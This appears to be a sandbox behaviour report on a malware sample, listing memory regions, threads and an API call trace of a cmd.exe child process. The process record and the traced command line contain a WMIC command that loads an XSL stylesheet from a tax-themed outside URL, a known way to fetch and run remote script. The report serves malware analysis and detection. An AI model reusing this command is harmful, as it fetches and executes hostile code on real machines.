	     region_type = private
	            name = "private_0x0000008192800000"
	        filename = ""

Region:
	              id = 2512
	        start_va = 0x20f97370000
	          end_va = 0x20f97371fff
	     entry_point = 0x20f97370000
	     region_type = mapped_file
	            name = "oleaccrc.dll"
	        filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll")

Region:
	              id = 2513
	        start_va = 0x20f99130000
	          end_va = 0x20f99131fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020f99130000"
	        filename = ""

Region:
	              id = 2514
	        start_va = 0x20f9b660000
	          end_va = 0x20f9b7b1fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020f9b660000"
	        filename = ""

Region:
	              id = 2515
	        start_va = 0x7ffc0a910000
	          end_va = 0x7ffc0ab12fff
	     entry_point = 0x7ffc0a910000
	     region_type = mapped_file
	            name = "wpdshext.dll"
	        filename = "\\Windows\\System32\\wpdshext.dll" (normalized: "c:\\windows\\system32\\wpdshext.dll")


Thread:
	id = 1
	os_tid = 0xc88


Thread:
	id = 2
	os_tid = 0xc7c


Thread:
	id = 3
	os_tid = 0xc58


Thread:
	id = 4
	os_tid = 0xc3c


Thread:
	id = 5
	os_tid = 0xc2c


Thread:
	id = 6
	os_tid = 0xc18


Thread:
	id = 7
	os_tid = 0xc04


Thread:
	id = 8
	os_tid = 0x36c


Thread:
	id = 9
	os_tid = 0xff4


Thread:
	id = 10
	os_tid = 0xff0


Thread:
	id = 11
	os_tid = 0xfd0


Thread:
	id = 12
	os_tid = 0xfa8


Thread:
	id = 13
	os_tid = 0xfa0


Thread:
	id = 14
	os_tid = 0xf94


Thread:
	id = 15
	os_tid = 0xf84


Thread:
	id = 16
	os_tid = 0xf30


Thread:
	id = 17
	os_tid = 0xf20


Thread:
	id = 18
	os_tid = 0xf18


Thread:
	id = 19
	os_tid = 0xf14

	[0580.983] CClassCache::CleanUpLocalServersForApartment () 

Thread:
	id = 20
	os_tid = 0xf10


Thread:
	id = 21
	os_tid = 0xf08


Thread:
	id = 22
	os_tid = 0xf04


Thread:
	id = 23
	os_tid = 0xf00


Thread:
	id = 24
	os_tid = 0xefc


Thread:
	id = 25
	os_tid = 0xef8


Thread:
	id = 26
	os_tid = 0xef4


Thread:
	id = 27
	os_tid = 0xef0


Thread:
	id = 28
	os_tid = 0xeec


Thread:
	id = 29
	os_tid = 0xee0


Thread:
	id = 30
	os_tid = 0xedc


Thread:
	id = 31
	os_tid = 0xb10


Thread:
	id = 32
	os_tid = 0x2dc


Thread:
	id = 178
	os_tid = 0xf1c


Thread:
	id = 179
	os_tid = 0xf74


Thread:
	id = 260
	os_tid = 0xde4


Thread:
	id = 261
	os_tid = 0xb88


Thread:
	id = 262
	os_tid = 0xb50


Thread:
	id = 263
	os_tid = 0xc28


Thread:
	id = 264
	os_tid = 0xc40


Thread:
	id = 265
	os_tid = 0xc54


Thread:
	id = 266
	os_tid = 0x774


Thread:
	id = 275
	os_tid = 0xf98


Process:
	id = "2"
	image_name = "cmd.exe"
	filename = "c:\\windows\\system32\\cmd.exe"
	page_root = "0x39afc000"
	os_pid = "0xccc"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xed8"
	cmd_line = "CMD.EXE  /C wmic os get /format:\"https://itaxkenya.com/kra/tax_returns.xsl\" "
	cur_dir = "C:\\Users\\Nd9E1FYi\\Desktop\\"
	os_username = "X2VS1CUM\\Nd9E1FYi"
	os_groups = "X2VS1CUM\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb37" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 506
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 507
	        start_va = 0x194dd00000
	          end_va = 0x194ddfffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000194dd00000"
	        filename = ""

Region:
	              id = 508
	        start_va = 0x194de00000
	          end_va = 0x194dffffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000194de00000"
	        filename = ""

Region:
	              id = 509
	        start_va = 0x1ebe75c0000
	          end_va = 0x1ebe75dffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001ebe75c0000"
	        filename = ""

Region:
	              id = 510
	        start_va = 0x1ebe75e0000
	          end_va = 0x1ebe75f4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001ebe75e0000"
	        filename = ""

Region:
	              id = 511
	        start_va = 0x1ebe7600000
	          end_va = 0x1ebe7603fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001ebe7600000"
	        filename = ""

Region:
	              id = 512
	        start_va = 0x1ebe7610000
	          end_va = 0x1ebe7610fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001ebe7610000"
	        filename = ""

Region:
	              id = 513
	        start_va = 0x1ebe7620000
	          end_va = 0x1ebe7621fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001ebe7620000"
	        filename = ""

Region:
	              id = 514
	        start_va = 0x7df5ffa10000
	          end_va = 0x7ff5ffa0ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df5ffa10000"
	        filename = ""

Region:
	              id = 515
	        start_va = 0x7ff648f50000
	          end_va = 0x7ff648f72fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff648f50000"
	        filename = ""

Region:
	              id = 516
	        start_va = 0x7ff649110000
	          end_va = 0x7ff649169fff
	     entry_point = 0x7ff649110000
	     region_type = mapped_file
	            name = "cmd.exe"
	        filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")

Region:
	              id = 517
	        start_va = 0x7ffc17400000
	          end_va = 0x7ffc175c0fff
	     entry_point = 0x7ffc17400000
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 518
	        start_va = 0x1ebe7630000
	          end_va = 0x1ebe772ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001ebe7630000"
	        filename = ""

Region:
	              id = 519
	        start_va = 0x7ffc14550000
	          end_va = 0x7ffc14737fff
	     entry_point = 0x7ffc14550000
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")

Region:
	              id = 520
	        start_va = 0x7ffc17120000
	          end_va = 0x7ffc171ccfff
	     entry_point = 0x7ffc17120000
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")

Region:
	              id = 594
	        start_va = 0x194e000000
	          end_va = 0x194e0fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000194e000000"
	        filename = ""

Region:
	              id = 595
	        start_va = 0x1ebe75c0000
	          end_va = 0x1ebe75cffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001ebe75c0000"
	        filename = ""

Region:
	              id = 596
	        start_va = 0x1ebe75d0000
	          end_va = 0x1ebe75d6fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001ebe75d0000"
	        filename = ""

Region:
	              id = 597
	        start_va = 0x1ebe7730000
	          end_va = 0x1ebe77edfff
	     entry_point = 0x1ebe7730000
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 598
	        start_va = 0x1ebe7970000
	          end_va = 0x1ebe797ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001ebe7970000"
	        filename = ""

Region:
	              id = 599
	        start_va = 0x7ff648e50000
	          end_va = 0x7ff648f4ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff648e50000"
	        filename = ""

Region:
	              id = 600
	        start_va = 0x7ffc164b0000
	          end_va = 0x7ffc1654cfff
	     entry_point = 0x7ffc164b0000
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")

Region:
	              id = 601
	        start_va = 0x1ebe77f0000
	          end_va = 0x1ebe77f6fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001ebe77f0000"
	        filename = ""

Region:
	              id = 602
	        start_va = 0x1ebe7980000
	          end_va = 0x1ebe7cb6fff
	     entry_point = 0x1ebe7980000
	     region_type = mapped_file
	            name = "sortdefault.nls"
	        filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")


Thread:
	id = 33
	os_tid = 0xe0

	[0048.736] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff649110000
	[0048.736] __set_app_type (_Type=0x1) 
	[0048.736] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff649125700) returned 0x0
	[0048.736] __getmainargs (in: _Argc=0x7ff649140108, _Argv=0x7ff649140110, _Env=0x7ff649140118, _DoWildCard=0, _StartInfo=0x7ff649140124 | out: _Argc=0x7ff649140108, _Argv=0x7ff649140110, _Env=0x7ff649140118) returned 0
	[0048.736] GetCurrentThreadId () returned 0xe0
	[0048.736] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xe0) returned 0x6c
	[0048.736] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x7ffc17120000
	[0048.737] GetProcAddress (hModule=0x7ffc17120000, lpProcName="SetThreadUILanguage") returned 0x7ffc17143270
	[0048.737] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0048.744] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
	[0048.744] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x194ddffea8 | out: phkResult=0x194ddffea8*=0x0) returned 0x2
	[0048.745] VirtualQuery (in: lpAddress=0x194ddffe94, lpBuffer=0x194ddffe10, dwLength=0x30 | out: lpBuffer=0x194ddffe10*(BaseAddress=0x194ddff000, AllocationBase=0x194dd00000, AllocationProtect=0x4, __alignment1=0xfffff802, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xffff8000)) returned 0x30
	[0048.745] VirtualQuery (in: lpAddress=0x194dd00000, lpBuffer=0x194ddffe10, dwLength=0x30 | out: lpBuffer=0x194ddffe10*(BaseAddress=0x194dd00000, AllocationBase=0x194dd00000, AllocationProtect=0x4, __alignment1=0xfffff802, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0xffff8000)) returned 0x30
	[0048.745] VirtualQuery (in: lpAddress=0x194dd01000, lpBuffer=0x194ddffe10, dwLength=0x30 | out: lpBuffer=0x194ddffe10*(BaseAddress=0x194dd01000, AllocationBase=0x194dd00000, AllocationProtect=0x4, __alignment1=0xfffff802, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0xffff8000)) returned 0x30
	[0048.745] VirtualQuery (in: lpAddress=0x194dd04000, lpBuffer=0x194ddffe10, dwLength=0x30 | out: lpBuffer=0x194ddffe10*(BaseAddress=0x194dd04000, AllocationBase=0x194dd00000, AllocationProtect=0x4, __alignment1=0xfffff802, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xffff8000)) returned 0x30
	[0048.745] VirtualQuery (in: lpAddress=0x194de00000, lpBuffer=0x194ddffe10, dwLength=0x30 | out: lpBuffer=0x194ddffe10*(BaseAddress=0x194de00000, AllocationBase=0x194de00000, AllocationProtect=0x4, __alignment1=0xfffff802, RegionSize=0x1d7000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0xffff8000)) returned 0x30
	[0048.745] GetConsoleOutputCP () returned 0x1b5
	[0048.745] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff649149660 | out: lpCPInfo=0x7ff649149660) returned 1
	[0048.745] SetConsoleCtrlHandler (HandlerRoutine=0x7ff649132ad0, Add=1) returned 1
	[0048.745] _get_osfhandle (_FileHandle=1) returned 0x24
	[0048.745] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x0) returned 1
	[0048.746] _get_osfhandle (_FileHandle=1) returned 0x24
	[0048.746] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff64914960c | out: lpMode=0x7ff64914960c) returned 1
	[0048.746] _get_osfhandle (_FileHandle=1) returned 0x24
	[0048.746] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1
	[0048.746] _get_osfhandle (_FileHandle=0) returned 0x20
	[0048.746] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff649149608 | out: lpMode=0x7ff649149608) returned 1
	[0048.746] _get_osfhandle (_FileHandle=0) returned 0x20
	[0048.746] SetConsoleMode (hConsoleHandle=0x20, dwMode=0x1e7) returned 1
	[0048.746] GetEnvironmentStringsW () returned 0x1ebe7635730*
	[0048.746] FreeEnvironmentStringsA (penv="=") returned 1
	[0048.746] GetEnvironmentStringsW () returned 0x1ebe7635730*
	[0048.746] FreeEnvironmentStringsA (penv="=") returned 1
	[0048.746] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x194ddfed58 | out: phkResult=0x194ddfed58*=0x78) returned 0x0
	[0048.747] RegQueryValueExW (in: hKey=0x78, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x194ddfed50, lpData=0x194ddfed70, lpcbData=0x194ddfed54*=0x1000 | out: lpType=0x194ddfed50*=0x0, lpData=0x194ddfed70*=0x0, lpcbData=0x194ddfed54*=0x1000) returned 0x2
	[0048.747] RegQueryValueExW (in: hKey=0x78, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x194ddfed50, lpData=0x194ddfed70, lpcbData=0x194ddfed54*=0x1000 | out: lpType=0x194ddfed50*=0x4, lpData=0x194ddfed70*=0x1, lpcbData=0x194ddfed54*=0x4) returned 0x0
	[0048.747] RegQueryValueExW (in: hKey=0x78, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x194ddfed50, lpData=0x194ddfed70, lpcbData=0x194ddfed54*=0x1000 | out: lpType=0x194ddfed50*=0x0, lpData=0x194ddfed70*=0x1, lpcbData=0x194ddfed54*=0x1000) returned 0x2
	[0048.747] RegQueryValueExW (in: hKey=0x78, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x194ddfed50, lpData=0x194ddfed70, lpcbData=0x194ddfed54*=0x1000 | out: lpType=0x194ddfed50*=0x4, lpData=0x194ddfed70*=0x0, lpcbData=0x194ddfed54*=0x4) returned 0x0
	[0048.748] RegQueryValueExW (in: hKey=0x78, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x194ddfed50, lpData=0x194ddfed70, lpcbData=0x194ddfed54*=0x1000 | out: lpType=0x194ddfed50*=0x4, lpData=0x194ddfed70*=0x40, lpcbData=0x194ddfed54*=0x4) returned 0x0
	[0048.748] RegQueryValueExW (in: hKey=0x78, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x194ddfed50, lpData=0x194ddfed70, lpcbData=0x194ddfed54*=0x1000 | out: lpType=0x194ddfed50*=0x4, lpData=0x194ddfed70*=0x40, lpcbData=0x194ddfed54*=0x4) returned 0x0
	[0048.748] RegQueryValueExW (in: hKey=0x78, lpValueName="AutoRun", lpReserved=0x0, lpType=0x194ddfed50, lpData=0x194ddfed70, lpcbData=0x194ddfed54*=0x1000 | out: lpType=0x194ddfed50*=0x0, lpData=0x194ddfed70*=0x40, lpcbData=0x194ddfed54*=0x1000) returned 0x2
	[0048.748] RegCloseKey (hKey=0x78) returned 0x0
	[0048.748] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x194ddfed58 | out: phkResult=0x194ddfed58*=0x78) returned 0x0
	[0048.748] RegQueryValueExW (in: hKey=0x78, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x194ddfed50, lpData=0x194ddfed70, lpcbData=0x194ddfed54*=0x1000 | out: lpType=0x194ddfed50*=0x0, lpData=0x194ddfed70*=0x40, lpcbData=0x194ddfed54*=0x1000) returned 0x2
	[0048.748] RegQueryValueExW (in: hKey=0x78, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x194ddfed50, lpData=0x194ddfed70, lpcbData=0x194ddfed54*=0x1000 | out: lpType=0x194ddfed50*=0x4, lpData=0x194ddfed70*=0x1, lpcbData=0x194ddfed54*=0x4) returned 0x0
	[0048.748] RegQueryValueExW (in: hKey=0x78, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x194ddfed50, lpData=0x194ddfed70, lpcbData=0x194ddfed54*=0x1000 | out: lpType=0x194ddfed50*=0x0, lpData=0x194ddfed70*=0x1, lpcbData=0x194ddfed54*=0x1000) returned 0x2
	[0048.748] RegQueryValueExW (in: hKey=0x78, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x194ddfed50, lpData=0x194ddfed70, lpcbData=0x194ddfed54*=0x1000 | out: lpType=0x194ddfed50*=0x4, lpData=0x194ddfed70*=0x0, lpcbData=0x194ddfed54*=0x4) returned 0x0
	[0048.748] RegQueryValueExW (in: hKey=0x78, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x194ddfed50, lpData=0x194ddfed70, lpcbData=0x194ddfed54*=0x1000 | out: lpType=0x194ddfed50*=0x4, lpData=0x194ddfed70*=0x9, lpcbData=0x194ddfed54*=0x4) returned 0x0
	[0048.748] RegQueryValueExW (in: hKey=0x78, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x194ddfed50, lpData=0x194ddfed70, lpcbData=0x194ddfed54*=0x1000 | out: lpType=0x194ddfed50*=0x4, lpData=0x194ddfed70*=0x9, lpcbData=0x194ddfed54*=0x4) returned 0x0
	[0048.748] RegQueryValueExW (in: hKey=0x78, lpValueName="AutoRun", lpReserved=0x0, lpType=0x194ddfed50, lpData=0x194ddfed70, lpcbData=0x194ddfed54*=0x1000 | out: lpType=0x194ddfed50*=0x0, lpData=0x194ddfed70*=0x9, lpcbData=0x194ddfed54*=0x1000) returned 0x2
	[0048.748] RegCloseKey (hKey=0x78) returned 0x0
	[0048.748] time (in: timer=0x0 | out: timer=0x0) returned 0x5b32a918
	[0048.748] srand (_Seed=0x5b32a918) 
	[0048.748] GetCommandLineW () returned="CMD.EXE  /C wmic os get /format:\"https://itaxkenya.com/kra/tax_returns.xsl\" "
	[0048.748] GetCommandLineW () returned="CMD.EXE  /C wmic os get /format:\"https://itaxkenya.com/kra/tax_returns.xsl\" "
	[0048.748] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x7ff649151940 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop") returned 0x19
	[0048.748] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1ebe76379f0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\CMD.EXE" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b
	[0048.748] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff6491496a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87
	[0048.748] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff6491496a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0048.748] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff6491496a0, nSize=0x2000 | out: lpBuffer="") returned 0x0
	[0048.749] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13
	[0048.749] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11
	[0048.749] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13
	[0048.749] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13
	[0048.749] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12
	[0048.749] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4
	[0048.749] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2
	[0048.749] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8
	[0048.749] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1
	[0048.749] GetEnvironmentStringsW () returned 0x1ebe7635730*
	[0048.749] FreeEnvironmentStringsA (penv="=") returned 1
	[0048.749] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x7ff6491496a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b
	[0048.749] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x7ff6491496a0, nSize=0x2000 | out: lpBuffer="") returned 0x0
	[0048.749] _wcsicmp (_String1="KEYS", _String2="CD") returned 8
	[0048.749] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6
	[0048.749] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8
	[0048.749] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8
	[0048.749] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7
	[0048.749] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9
	[0048.749] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7
	[0048.749] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3
	[0048.749] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x194ddffb60 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop") returned 0x19
	[0048.749] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\Desktop", nBufferLength=0x104, lpBuffer=0x194ddffb60, lpFilePart=0x194ddffb40 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop", lpFilePart=0x194ddffb40*="Desktop") returned 0x19
	[0048.749] GetFileAttributesW (lpFileName="C:\\Users\\Nd9E1FYi\\Desktop" (normalized: "c:\\users\\nd9e1fyi\\desktop")) returned 0x11
	[0048.750] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x194ddff870 | out: lpFindFileData=0x194ddff870) returned 0x1ebe76308b0
	[0048.750] FindClose (in: hFindFile=0x1ebe76308b0 | out: hFindFile=0x1ebe76308b0) returned 1
	[0048.750] FindFirstFileW (in: lpFileName="C:\\Users\\Nd9E1FYi", lpFindFileData=0x194ddff870 | out: lpFindFileData=0x194ddff870) returned 0x1ebe7630720
	[0048.750] FindClose (in: hFindFile=0x1ebe7630720 | out: hFindFile=0x1ebe7630720) returned 1
	[0048.750] FindFirstFileW (in: lpFileName="C:\\Users\\Nd9E1FYi\\Desktop", lpFindFileData=0x194ddff870 | out: lpFindFileData=0x194ddff870) returned 0x1ebe7630720
	[0048.751] FindClose (in: hFindFile=0x1ebe7630720 | out: hFindFile=0x1ebe7630720) returned 1
	[0048.751] GetFileAttributesW (lpFileName="C:\\Users\\Nd9E1FYi\\Desktop" (normalized: "c:\\users\\nd9e1fyi\\desktop")) returned 0x11
	[0048.751] SetCurrentDirectoryW (lpPathName="C:\\Users\\Nd9E1FYi\\Desktop" (normalized: "c:\\users\\nd9e1fyi\\desktop")) returned 1
	[0048.751] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\Nd9E1FYi\\Desktop") returned 1
	[0048.751] GetEnvironmentStringsW () returned 0x1ebe7638790*
	[0048.751] FreeEnvironmentStringsA (penv="=") returned 1
	[0048.751] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x7ff649151940 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop") returned 0x19
	[0048.751] GetConsoleOutputCP () returned 0x1b5
	[0048.752] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff649149660 | out: lpCPInfo=0x7ff649149660) returned 1
	[0048.752] GetUserDefaultLCID () returned 0x409
	[0048.752] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x7ff64914d6a0, cchData=8 | out: lpLCData=":") returned 2
	[0048.752] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x194ddffc90, cchData=128 | out: lpLCData="0") returned 2
	[0048.752] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x194ddffc90, cchData=128 | out: lpLCData="0") returned 2
	[0048.752] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x194ddffc90, cchData=128 | out: lpLCData="1") returned 2
	[0048.752] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x7ff64914d6b0, cchData=8 | out: lpLCData="/") returned 2
	[0048.752] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x7ff64914d700, cchData=32 | out: lpLCData="Mon") returned 4
	[0048.752] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x7ff64914d740, cchData=32 | out: lpLCData="Tue") returned 4
	[0048.752] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x7ff64914d780, cchData=32 | out: lpLCData="Wed") returned 4
	[0048.752] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x7ff64914d7c0, cchData=32 | out: lpLCData="Thu") returned 4
	[0048.752] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x7ff64914d800, cchData=32 | out: lpLCData="Fri") returned 4
	[0048.752] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x7ff64914d840, cchData=32 | out: lpLCData="Sat") returned 4
	[0048.752] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x7ff64914d880, cchData=32 | out: lpLCData="Sun") returned 4
	[0048.752] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x7ff64914d6c0, cchData=8 | out: lpLCData=".") returned 2
	[0048.752] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x7ff64914d6e0, cchData=8 | out: lpLCData=",") returned 2
	[0048.752] setlocale (category=0, locale=".OCP") returned="English_United States.437"
	[0048.754] GetConsoleTitleW (in: lpConsoleTitle=0x1ebe76310c0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\CMD.EXE") returned 0x1b
	[0048.754] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x7ffc17120000
	[0048.754] GetProcAddress (hModule=0x7ffc17120000, lpProcName="CopyFileExW") returned 0x7ffc17148940
	[0048.754] GetProcAddress (hModule=0x7ffc17120000, lpProcName="IsDebuggerPresent") returned 0x7ffc17147460
	[0048.754] GetProcAddress (hModule=0x7ffc17120000, lpProcName="SetConsoleInputExeNameW") returned 0x7ffc145a6e50
	[0048.755] _wcsicmp (_String1="wmic", _String2=")") returned 78
	[0048.755] _wcsicmp (_String1="FOR", _String2="wmic") returned -17
	[0048.755] _wcsicmp (_String1="FOR/?", _String2="wmic") returned -17
	[0048.755] _wcsicmp (_String1="IF", _String2="wmic") returned -14
	[0048.755] _wcsicmp (_String1="IF/?", _String2="wmic") returned -14
	[0048.755] _wcsicmp (_String1="REM", _String2="wmic") returned -5
	[0048.755] _wcsicmp (_String1="REM/?", _String2="wmic") returned -5
	[0048.756] GetConsoleTitleW (in: lpConsoleTitle=0x194ddffb80, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\CMD.EXE") returned 0x1b
	[0048.756] _wcsicmp (_String1="wmic", _String2="DIR") returned 19
	[0048.756] _wcsicmp (_String1="wmic", _String2="ERASE") returned 18
	[0048.756] _wcsicmp (_String1="wmic", _String2="DEL") returned 19
	[0048.756] _wcsicmp (_String1="wmic", _String2="TYPE") returned 3
	[0048.756] _wcsicmp (_String1="wmic", _String2="COPY") returned 20
	[0048.756] _wcsicmp (_String1="wmic", _String2="CD") returned 20
	[0048.756] _wcsicmp (_String1="wmic", _String2="CHDIR") returned 20
	[0048.756] _wcsicmp (_String1="wmic", _String2="RENAME") returned 5
	[0048.756] _wcsicmp (_String1="wmic", _String2="REN") returned 5
	[0048.756] _wcsicmp (_String1="wmic", _String2="ECHO") returned 18
	[0048.756] _wcsicmp (_String1="wmic", _String2="SET") returned 4
	[0048.756] _wcsicmp (_String1="wmic", _String2="PAUSE") returned 7
	[0048.756] _wcsicmp (_String1="wmic", _String2="DATE") returned 19
	[0048.756] _wcsicmp (_String1="wmic", _String2="TIME") returned 3
	[0048.756] _wcsicmp (_String1="wmic", _String2="PROMPT") returned 7
